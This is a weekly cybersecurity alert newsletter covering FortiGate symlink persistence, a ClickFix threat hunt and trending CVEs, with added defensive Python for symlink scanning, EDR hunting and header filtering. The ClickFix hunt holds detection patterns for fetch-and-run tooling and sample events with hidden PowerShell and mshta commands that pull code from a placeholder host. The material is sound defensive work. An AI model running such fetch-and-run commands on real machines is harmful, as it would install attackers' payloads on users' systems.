Weekly Alert: IT Cybersecurity Support
Our Weekly Threat Intelligence Summary is compiled by expert threat analysts, highlighting the key threat events you should know about and offering mitigation recommendations.
Top Intelligence Events
Fortinet Warns Attackers Retain Access to Patched FortiGate VPNs Using Symlinks
Fortinet has identified a technique used by threat actors to retain unauthorized, read-only access to previously compromised FortiGate VPN devices even after the initial access vector was patched. The attackers are believed to have leveraged known and now-patched security flaws, including, but not limited to, CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762. The attackers inserted a symbolic link (symlink) that connects the user file system to the root file system. This symlink was placed in a directory tied to the SSL-VPN language file function, allowing persistent access without triggering alerts. To counter the issue, Fortinet has implemented targeted updates across FortiOS versions, including automated removal of the symlink through detection rules and changes to the SSL-VPN interface to prevent similar abuses.
- FortiOS 7.4, 7.2, 7.0, 6.4: The symbolic link was flagged as malicious by the AV/IPS engine so that it would be automatically removed if the engine was licensed and enabled.
- FortiOS 7.6.2, 7.4.7, 7.2.11 & 7.0.17, 6.4.16: Upgrading to these releases removes the malicious symbolic link.
- FortiOS 7.6.2, 7.4.7, 7.2.11 & 7.0.17, 6.4.16: The SSL-VPN UI has been modified to prevent the serving of such malicious symbolic links.
Organizations that manage their own devices are advised to immediately upgrade their FortiGate firewalls to the latest version of FortiOS (7.6.2, 7.4.7, 7.2.11, 7.0.17, 6.4.16) to detect and remove symbolic links and ensure the SSL-VPN only serves the expected files. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an advisory of its own, urging users to reset exposed credentials and consider disabling SSL-VPN functionality until the patches can be applied.
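The persistence described above works because a symlink placed inside a served directory resolves to a location outside it. The following is an added example, not Fortinet's code or part of this report: a scanner that flags any symlink under a served tree whose final target escapes that tree, plus the serve-time check a file handler should perform before returning a file. The webroot/lang layout, file names and the symlink to "/" are constructed for the demo; the page does not give the real FortiOS directory.

```python
"""Added example, not Fortinet's code: find symlinks under a served directory
that resolve outside it, and refuse to serve any path that escapes the root.
The webroot/lang layout and the file names below are constructed for the demo;
the page does not give the real FortiOS directory."""
import os
import tempfile
from pathlib import Path


def _inside(root: Path, candidate: Path) -> bool:
    """True if candidate is root itself or lies beneath it (both already resolved)."""
    return candidate == root or root in candidate.parents


def escaping_symlinks(served_root: str) -> list[tuple[str, str]]:
    """Walk served_root without following links and return
    (link_path, resolved_target) for every symlink whose final target
    is outside the served tree."""
    root = Path(served_root).resolve()
    findings = []
    for dirpath, dirnames, filenames in os.walk(served_root, followlinks=False):
        for name in dirnames + filenames:
            link = Path(dirpath) / name
            if link.is_symlink():
                target = link.resolve()  # follows the whole chain, even if the target is missing
                if not _inside(root, target):
                    findings.append((str(link), str(target)))
    return findings


def safe_to_serve(served_root: str, requested: str) -> bool:
    """Serve-time check: resolve the requested relative path (symlinks and
    '..' included) and allow it only if it still lands inside served_root."""
    root = Path(served_root).resolve()
    candidate = (root / requested).resolve()
    return _inside(root, candidate)


def build_demo() -> str:
    """Constructed directory tree: one benign relative symlink and one
    symlink that points at the root file system, as in the advisory."""
    base = Path(tempfile.mkdtemp())
    lang = base / "webroot" / "lang"
    lang.mkdir(parents=True)
    (lang / "en.json").write_text("{}")
    os.symlink("en.json", lang / "default.json")  # stays inside the served tree
    os.symlink("/", lang / "zz")                  # escapes to the root file system
    return str(base / "webroot")


if __name__ == "__main__":
    root = build_demo()
    for link, target in escaping_symlinks(root):
        print(f"ESCAPING SYMLINK {link} -> {target}")
    print(safe_to_serve(root, "lang/en.json"))        # True
    print(safe_to_serve(root, "lang/zz/etc/passwd"))  # False
```

The scanner is what you would run (or schedule) against a served tree to detect a planted link; the serve-time check is the control the advisory describes on the SSL-VPN side, namely resolving the full path before serving it rather than trusting that a file living under the language directory must be a language file.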
Threat Hunting
The Threat Hunting Team at PDI utilizes trends and actionable intelligence to determine which hunts to prioritize. Here are the most significant hunts from the past week, along with the necessary log dependencies and a brief summary of each:
Threat Hunt: Exploitation of CLFS zero-day
Date: 04/14/25
Threat Hunt: Alternate ClickFix Methods
Date: 4/15/2025
Log Dependencies: SentinelOne, Crowdstrike, Carbon Black
Summary: As ClickFix rises in popularity, attackers are becoming more creative in how they exploit the user. ClickFix attacks are disguised as CAPTCHAs in order to manipulate the user into "verifying" themselves by running commands on their device. A typical CAPTCHA only asks for input such as typing a colorful string of characters in different sizes and fonts into a text box, clicking the squares that contain a required object (traffic lights, buses, stairs, bicycles, etc.), or moving a puzzle piece into place. A CAPTCHA will never ask you to run a command on your system or do anything outside the browser's web page. This hunt searches for indications of command-line activity involving this social engineering technique.
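To show what "command-line activity involving this social engineering technique" looks like in EDR telemetry, here is an added example that is not PDI's hunt logic: it scores process-creation events where an interactive parent (a browser, or explorer.exe for the Run dialog) spawns a script host, and reports which ClickFix-shaped indicators fire on the command line. The field names (parent_image, image, command_line) and the five sample events are constructed; map them onto whatever your EDR exports.

```python
"""Added example, not PDI's hunt logic: score EDR process-creation events
for ClickFix-style activity. Field names (parent_image, image, command_line)
and the sample events are constructed for the demo; map them onto the
fields your EDR actually exports."""
import json
import re

# A ClickFix chain starts from something the user clicked or pasted into:
# a browser, or the Run dialog / File Explorer (explorer.exe) ...
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
# ... and lands in a script host that can fetch and run a next stage.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "fetch_and_run": re.compile(r"\b(?:iex|invoke-expression|downloadstring|invoke-webrequest|irm|iwr)\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_hta": re.compile(r"mshta(?:\.exe)?\s+https?://", re.I),
    # The pasted command usually carries the lure text itself as a trailing comment.
    "captcha_lure": re.compile(r"captcha|i am (?:not )?a robot|verif(?:y|ication)", re.I),
}


def score_event(event: dict) -> list[str]:
    """Return the indicator names that fire for one event, or [] when the
    parent/child pair is not a ClickFix-shaped chain."""
    parent = event.get("parent_image", "").lower()
    image = event.get("image", "").lower()
    if parent not in INTERACTIVE_PARENTS or image not in INTERPRETERS:
        return []
    cmd = event.get("command_line", "")
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def hunt_clickfix(jsonl: str) -> list[dict]:
    """Run the hunt over newline-delimited JSON events; return the hits with
    the indicators that matched so an analyst can triage them."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        fired = score_event(event)
        if fired:
            hits.append({"id": event["id"], "image": event["image"], "indicators": fired})
    return hits


# Constructed sample events (not real telemetry); the domain is reserved and does not resolve.
SAMPLE_EVENTS = r"""
{"id": 1, "parent_image": "explorer.exe", "image": "powershell.exe", "command_line": "powershell.exe -w hidden -c \"iex (irm https://lure.example.invalid/v)\" # I am not a robot - reCAPTCHA Verification ID: 8421"}
{"id": 2, "parent_image": "chrome.exe", "image": "mshta.exe", "command_line": "mshta.exe https://lure.example.invalid/verify.hta"}
{"id": 3, "parent_image": "explorer.exe", "image": "cmd.exe", "command_line": "cmd.exe /c dir C:\\Users"}
{"id": 4, "parent_image": "svchost.exe", "image": "powershell.exe", "command_line": "powershell.exe -NoProfile -Command Get-Service"}
{"id": 5, "parent_image": "msedge.exe", "image": "powershell.exe", "command_line": "powershell.exe -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"}
"""

if __name__ == "__main__":
    for hit in hunt_clickfix(SAMPLE_EVENTS):
        print(hit)
```

Events 3 and 4 are deliberately not hits: an explorer-spawned cmd.exe with a plain command line is everyday activity, and an encoded PowerShell launched by a service is a different hunt's problem. Requiring both the interactive-parent/script-host pairing and at least one command-line indicator is what keeps the hunt's output small enough to review by hand.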
Top Intelligence Trends
Vulnerabilities
Below are the top five trending vulnerabilities of the week. Trends are determined by criticality, activity, mentions, and exploitability. If your organization uses any of these technologies, you should prioritize patching against these threats.
- CVE-2025-29927 – Next.js is a React framework for building full-stack web applications. Prior to 14.2.25 and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommended that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 14.2.25 and 15.2.3.
- CVE-2025-0282 – A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.
- CVE-2025-24813 – Path Equivalence: ‘file.Name’ (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write-enabled Default Servlet in Apache Tomcat. This issue affects Apache Tomcat from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, and from 9.0.0.M1 through 9.0.98. If all of the following were true, a malicious user was able to view security-sensitive files and/or inject content into those files:
  - writes enabled for the default servlet (disabled by default)
  - support for partial PUT (enabled by default)
  - a target URL for security-sensitive uploads that was a sub-directory of a target URL for public uploads
  - attacker knowledge of the names of security-sensitive files being uploaded
  - the security-sensitive files also being uploaded via partial PUT
  If all of the following were true, a malicious user was able to perform remote code execution:
  - writes enabled for the default servlet (disabled by default)
  - support for partial PUT (enabled by default)
  - application was using Tomcat’s file-based session persistence with the default storage location
  - application included a library that may be leveraged in a deserialization attack
  Users are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.99, which fixes the issue.
- CVE-2025-1974 – A security issue was discovered in Kubernetes where under certain conditions, an unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller. This can lead to disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)
- CVE-2025-0411 – 7-Zip Mark-of-the-Web Bypass Vulnerability. This vulnerability allows remote attackers to bypass the Mark-of-the-Web protection mechanism on affected installations of 7-Zip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of archived files. When extracting files from a crafted archive that bears the Mark-of-the-Web, 7-Zip does not propagate the Mark-of-the-Web to the extracted files. An attacker can leverage this vulnerability to execute arbitrary code in the context of the current user.
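The interim mitigation given for CVE-2025-29927 above is to keep external requests carrying the x-middleware-subrequest header away from the Next.js application. As an added example that is not Next.js's or Vercel's code, here is that control implemented at a Python front layer as a WSGI wrapper, in two modes: reject the request outright, or strip the header and forward the rest. The demo upstream app, the request environ dicts and the header value are constructed for the test.

```python
"""Added example, not Next.js's or Vercel's code: a WSGI wrapper that keeps
externally supplied x-middleware-subrequest headers from reaching the
application, either by rejecting the request or by stripping the header.
The demo upstream app and the environ dicts are constructed for the test."""

# WSGI exposes request headers as environ keys:
# x-middleware-subrequest -> HTTP_X_MIDDLEWARE_SUBREQUEST
HEADER_ENV_KEY = "HTTP_X_MIDDLEWARE_SUBREQUEST"


def guard_subrequest_header(app, mode="reject"):
    """Wrap a WSGI app. mode="reject" answers 400 when the header is present;
    mode="strip" removes it and forwards the request otherwise unchanged."""
    if mode not in ("reject", "strip"):
        raise ValueError("mode must be 'reject' or 'strip'")

    def wrapped(environ, start_response):
        if HEADER_ENV_KEY in environ:
            if mode == "reject":
                start_response("400 Bad Request", [("Content-Type", "text/plain")])
                return [b"request carries a header reserved for internal use\n"]
            # Copy rather than mutate: other middleware may still hold the original.
            environ = {k: v for k, v in environ.items() if k != HEADER_ENV_KEY}
        return app(environ, start_response)

    return wrapped


def demo_app(environ, start_response):
    """Constructed stand-in for the protected application: reports whether
    it still sees the header, which is exactly what the wrapper must prevent."""
    seen = HEADER_ENV_KEY in environ
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"header seen\n" if seen else b"header absent\n"]


def call(app, environ):
    """Minimal WSGI driver: returns (status, body) for one request."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status

    body = b"".join(app(environ, start_response))
    return captured["status"], body


if __name__ == "__main__":
    external = {"REQUEST_METHOD": "GET", "PATH_INFO": "/admin", HEADER_ENV_KEY: "constructed-value"}
    clean = {"REQUEST_METHOD": "GET", "PATH_INFO": "/admin"}
    print(call(guard_subrequest_header(demo_app, "reject"), external))  # 400
    print(call(guard_subrequest_header(demo_app, "strip"), external))   # 200, header absent
    print(call(guard_subrequest_header(demo_app), clean))               # 200, header absent
```

The same control belongs at the reverse proxy if one sits in front of the application: in nginx, `proxy_set_header X-Middleware-Subrequest "";` drops the header before forwarding, because nginx does not pass a proxied header whose value is set to the empty string. Whichever layer you choose, it must be the one that receives the request directly from the outside; a filter placed behind another hop that forwards headers untouched does nothing.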
Fizen Technology
Have questions? Contact us if you have technology questions for your business. We are here to help you with your IT needs, so you can focus on your business. Thank you to our partner, PDI Security and Network Solutions, for their many efforts to consolidate information in the weekly report.